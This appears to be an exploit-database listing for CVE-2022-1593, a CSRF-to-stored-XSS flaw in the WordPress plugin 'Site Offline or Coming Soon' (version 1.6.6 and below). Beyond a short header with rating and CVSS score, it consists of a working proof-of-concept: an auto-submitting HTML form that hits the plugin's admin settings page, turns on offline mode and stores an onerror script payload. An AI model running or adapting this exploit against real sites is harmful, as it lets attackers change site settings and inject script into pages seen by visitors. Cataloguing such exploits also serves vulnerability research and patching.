Exploit for Site Offline or Coming Soon <= 1.6.6 - Stored Cross-Site Scripting via CSRF CVE-2022-1593

Name: Exploit for Site Offline or Coming Soon <= 1.6.6 - Stored Cross-Site Scripting via CSRF CVE-2022-1593
Rating: 5 (31 reviews)

2022-06-06 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:67678666-402B-4010-AC56-7067A0F40185
<form id="test" action="https://example.com/wp-admin/options-general.php?page=site-is-offline-plugin%2Fmain.php" method="POST">
    <input type="text" name="cp_siteoffline_enabled" value="true">
    <input type="text" name="cpso_save_settings" value="Änderungen speichern">
    <input type="text" name="cp_siteoffline_content" value="<img src=x onerror=alert(/XSS/)>">
</form>
<script>
    document.getElementById("test").submit();
</script>